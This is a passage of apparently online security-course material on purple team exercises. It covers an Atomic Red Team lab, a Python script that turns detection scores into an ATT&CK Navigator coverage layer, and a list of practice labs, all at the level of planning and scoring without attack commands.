PITFALL: Production Impact
┌─────────────────────────────────────────────────────────────┐
│ Problem: Testing causes outages or alerts security team │
│ Symptom: Disruption, loss of trust in program │
│ Fix: Proper scoping, test environments, coordination │
└─────────────────────────────────────────────────────────────┘
SUCCESS FACTORS:
✓ Executive sponsorship
✓ Dedicated time for exercises
✓ Clear improvement tracking
✓ Integration with detection engineering
✓ Realistic, threat-informed scenarios
✓ Collaborative culture
Purple teaming is a journey, not a destination. The value comes from continuous improvement, not one-time exercises.
Guided Lab: Purple Team Exercise
In this lab, you'll plan and execute a focused purple team exercise using Atomic Red Team.
Lab Environment:
- Windows test VM with Atomic Red Team installed
- SIEM or log analysis platform
- ATT&CK Navigator
- Exercise planning template
Exercise Steps:
- Select 5 techniques to test based on threat intel
- Document expected detections for each
- Prepare Atomic Red Team tests
- Execute techniques one at a time
- Validate detection for each (detected/missed)
- Document findings and gaps
- Propose detection improvements for gaps
- Create coverage Navigator layer
- Write exercise summary report
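The coverage Navigator layer from the steps above can be generated directly from your scores. A sketch using the 0-4 scale from earlier in this section; the `versions` and `gradient` fields follow the ATT&CK Navigator layer format, but check the layer-format version numbers against the Navigator instance you use:

```python
import json

# Scores from the exercise, on the 0-4 detection scale used earlier
results = {"T1059.001": 4, "T1547.001": 3, "T1003.001": 1, "T1053.005": 4}

layer = {
    "name": "Purple Team Coverage",
    "domain": "enterprise-attack",
    # Version numbers are assumptions; match them to your Navigator release
    "versions": {"layer": "4.5", "navigator": "4.9"},
    "techniques": [
        {"techniqueID": tid, "score": score,
         "comment": "Validated via Atomic Red Team"}
        for tid, score in results.items()
    ],
    "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"],
                 "minValue": 0, "maxValue": 4},
}

# Save this as e.g. purple_team_layer.json and open it in ATT&CK Navigator
layer_json = json.dumps(layer, indent=2)
print(f"{len(layer['techniques'])} techniques in layer")
```

Regenerating the layer after each exercise makes quarter-over-quarter coverage changes visible at a glance.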
Reflection Questions:
- Which techniques had the best/worst detection?
- What was the common cause of detection gaps?
- How would you prioritize improvements?
Week Outcome Check
By the end of this week, you should be able to:
- Distinguish adversary emulation from other security testing
- Explain the purple team collaborative model
- Plan threat-informed emulation exercises
- Use ATT&CK for structured detection testing
- Execute techniques using Atomic Red Team
- Score and track detection coverage
- Convert exercise findings into improvements
- Report purple team results to stakeholders
🎯 Hands-On Labs (Free & Essential)
Practice adversary emulation workflows before moving to reading resources.
🎮 TryHackMe: Red Team Fundamentals
What you'll do: Review adversary emulation concepts and testing workflows.
Why it matters: Solid foundations make purple team exercises effective.
Time estimate: 1.5-2 hours
🧨 Atomic Red Team: Technique Validation Sprint
What you'll do: Execute 5 ATT&CK tests and score detections (hit/miss).
Why it matters: Emulation exposes gaps you can fix immediately.
Time estimate: 2-3 hours
🛰️ MITRE Caldera: Run a Stock Operation
What you'll do: Launch a preset adversary profile and review telemetry.
Why it matters: Caldera simulates full kill chains for validation.
Time estimate: 2-3 hours
🧩 Lab: Supply Chain Emulation Plan
What you'll do: Design an emulation plan for a supply chain compromise.
Deliverable: Technique list, telemetry sources, and expected detections.
Why it matters: Purple team validation is the fastest way to close gaps.
Time estimate: 60-90 minutes
💡 Lab Tip: Start with low-impact techniques before expanding to noisy tests.
🧩 Supply Chain Emulation
Emulation helps validate defenses against compromised updates, build pipeline abuse, and trusted relationship misuse.
Emulation focus:
- T1195 supply chain compromise
- Trusted installer execution paths
- Update server traffic patterns
- Credential access via vendor tooling
📚 Building on CSY101 Week-13: Threat model trusted update paths before emulation.
Resources
Lab
Complete the following lab exercises to practice adversary emulation and purple team operations.